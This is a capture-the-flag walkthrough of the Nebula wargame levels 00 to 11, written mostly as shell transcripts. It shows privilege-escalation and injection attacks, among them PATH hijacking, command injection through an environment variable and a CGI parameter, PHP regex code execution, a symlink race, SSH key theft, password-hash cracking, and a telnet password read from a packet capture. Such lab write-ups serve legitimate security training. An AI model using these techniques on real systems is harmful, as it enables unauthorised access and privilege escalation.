Nebula

https://exploit-exercises.com/nebula/

level00

level00@nebula:~$ find / -perm -4000 2>/dev/null | grep -i flag00
/bin/.../flag00
/rofs/bin/.../flag00
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level01

level01@nebula:~$ ls
echo
level01@nebula:~$ cat echo
#!/bin/bash

/bin/bash
level01@nebula:~$ echo $PATH
/home/level01:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
level01@nebula:~$ /home/flag01/flag01
flag01@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level02

level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo level02 is cool")
level02 is cool
level02@nebula:~$ echo $USER
level02
level02@nebula:~$ USER="level02;/bin/bash;echo "
level02@nebula:~$ export USER
level02@nebula:~$ echo $USER
level02;/bin/bash;echo
level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo level02;/bin/bash;echo  is cool")
level02
flag02@nebula:~$ getflag
You have successfully executed getflag on a target account
flag02@nebula:~$ exit
exit
is cool

---

level03

level03@nebula:/home/flag03$ ls -alh
total 5.5K
drwxr-x--- 1 flag03 level03   60 2011-11-20 20:39 .
drwxr-xr-x 1 root   root     140 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3.3K 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 1 flag03 flag03    60 2017-01-18 02:27 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh
level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
done

level03@nebula:/home/flag03$ cd writable.d/
level03@nebula:/home/flag03/writable.d$ cat getflag.sh
#!/bin/bash

/bin/getflag > /tmp/getflag
level03@nebula:/home/flag03/writable.d$ cat /tmp/getflag
You have successfully executed getflag on a target account

---

level04

level04@nebula:~$ /home/flag04/flag04 /home/flag04/token
You may not access '/home/flag04/token'
level04@nebula:~$ ln -s /home/flag04/token thet
level04@nebula:~$ /home/flag04/flag04 thet
06508b5e-8909-4f38-b630-fdb148a848a2

---

level05

level05@nebula:~$ cd /home/flag05/
level05@nebula:/home/flag05$ ls -alh
total 9.0K
drwxr-x--- 1 flag05 level05   80 2017-01-18 02:34 .
drwxr-xr-x 1 root   root     200 2012-08-27 07:18 ..
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
-rw------- 1 flag05 flag05    14 2017-01-18 02:34 .bash_history
-rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05  3.3K 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05    60 2017-01-18 02:34 .cache
-rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh
level05@nebula:/home/flag05$ cd .backup/
level05@nebula:/home/flag05/.backup$ ls -alh
total 2.0K
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
drwxr-x--- 1 flag05 level05   80 2017-01-18 02:34 ..
-rw-rw-r-- 1 flag05 flag05  1.8K 2011-11-20 20:13 backup-19072011.tgz
level05@nebula:/home/flag05/.backup$ cp backup-19072011.tgz ~
level05@nebula:/home/flag05/.backup$ cd !$
cd ~
level05@nebula:~$ ls
backup-19072011.tgz
level05@nebula:~$ gunzip backup-19072011.tgz
level05@nebula:~$ ls
backup-19072011.tar
level05@nebula:~$ tar xvf backup-19072011.tar
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:~$ ssh flag05@localhost -i .ssh/id_rsa
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
...snip...
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level06

level06@nebula:~$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
level06@nebula:~$ exit
logout
Connection to nebula closed.
> john passwd
...snip...
> john --show passwd 
flag06:hello:993:993::/home/flag06:/bin/sh

1 password hash cracked, 0 left
>  ssh flag06@nebula

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
...snip...
flag06@nebula's password:
...snip...
flag06@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level07

> curl "http://nebula:7007/index.cgi?Host=%60/bin/getflag>/tmp/level07flag%60"
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination%
> ssh level07@nebula

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
...snip...
level07@nebula's password:
...snip...
level07@nebula:~$ cat /tmp/level07flag
You have successfully executed getflag on a target account

---

level08

Load pcap in Wireshark.

Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)

..wwwbugs login: l.le.ev.ve.el.l8.8
..
Password: backdoor...00Rm8.ate
.
..
Login incorrect
wwwbugs login: 

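The password is not 'backdoor': the dots in the captured stream are backspace keystrokes, not literal characters. The whole login was sent unencrypted, which is why it can be read back from the capture.

Applying the three backspaces to 'backdoor' and then the typed '00Rm8' gives:
backd00Rm8
Applying the next backspace to 'backd00Rm8' and then the typed 'ate' gives:
backd00Rmate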

---

level09

level09@nebula:~$ cat test
[email {${system($use_me)}}]

level09@nebula:~$ /home/flag09/flag09 test "/bin/getflag"
You have successfully executed getflag on a target account
PHP Notice:  Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

level09@nebula:~$

---

level10

level10@nebula:~$ cat nc.sh
#!/bin/bash

while true
do
        nc -l 18211 &
done
level10@nebula:~$ cat ln1.sh
#!/bin/bash

while true
do
        ln -sf /home/flag10/token /home/level10/token &
done
level10@nebula:~$ cat ln2.sh
#!/bin/bash

while true
do
        ln -sf /home/level10/x /home/level10/token &
done
level10@nebula:~$ cat run.sh
#!/bin/bash

while true
do
        /home/flag10/flag10 /home/level10/token 127.0.0.1 &
done
level10@nebula:~$ cat x
x

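* Run the other three scripts (ln1.sh, ln2.sh and run.sh) first, then nc.sh. This is a race condition: the two ln scripts keep repointing /home/level10/token between the file x and /home/flag10/token while flag10 runs, so flag10 presumably checks the path at one moment and opens it at another (time-of-check to time-of-use).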

level10@nebula:~$ ./nc.sh 
nc: nc: nc: nc: nc: nc: nc: nc: nc: nc: nc: nc:
nc: Address already in use
nc: .oO Oo.
x
Address already in use
Address already in use
Address already in use
Address already in use
nc: nc: nc: Address already in use
Address already in use
Address already in use
Address already in use
nc: Address already in use
nc: Address already in use
Address already in use
.oO Oo.
x
nc: Address already in use
Address already in use
Address already in use
Address already in use
Address already in use
nc: nc: nc: Address already in use
nc: Address already in use
nc: Address already in use
Address already in use
Address already in use
nc: nc: nc: Address already in use
nc: .oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27

---

level11

level11@nebula:~$ PATH=/home/level11:$PATH
level11@nebula:~$ export PATH
level11@nebula:~$ echo -e "Content-Length: 1\nDDD" | /home/flag11/flag11
getflag is executing on a non-flag account, this doesn't count (BUG)

TBC...
